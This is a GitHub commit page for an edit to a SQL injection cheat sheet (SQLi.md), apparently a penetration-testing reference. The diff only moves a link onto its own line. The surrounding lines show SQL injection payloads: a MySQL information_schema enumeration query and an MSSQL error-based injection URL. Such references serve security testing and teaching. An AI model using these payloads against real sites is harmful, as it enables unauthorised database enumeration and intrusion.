Skip to content

Commit

Permalink
Update SQLi.md
Browse files Browse the repository at this point in the history
  • Loading branch information
xMilkPowderx committed Oct 20, 2018
1 parent 5ce4e72 commit 6bf89b5
Showing 1 changed file with 2 additions and 1 deletion.
3 changes: 2 additions & 1 deletion SQLi.md
Original file line number Diff line number Diff line change
Expand Up @@ -56,7 +56,8 @@ column_name from information_schema.columns wher

concat(table_schema,0x3a,table_name,0x3a,column_name) from information_schema.columns where table_schema=database()

### MSSQL Enumeration: Error based - https://www.exploit-db.com/papers/12975/
### MSSQL Enumeration: Error based
https://www.exploit-db.com/papers/12975/

Enumerate column and table name
http://www.example.com/page.asp?id=1' HAVING 1=1--
Expand Down

0 comments on commit 6bf89b5

Please sign in to comment.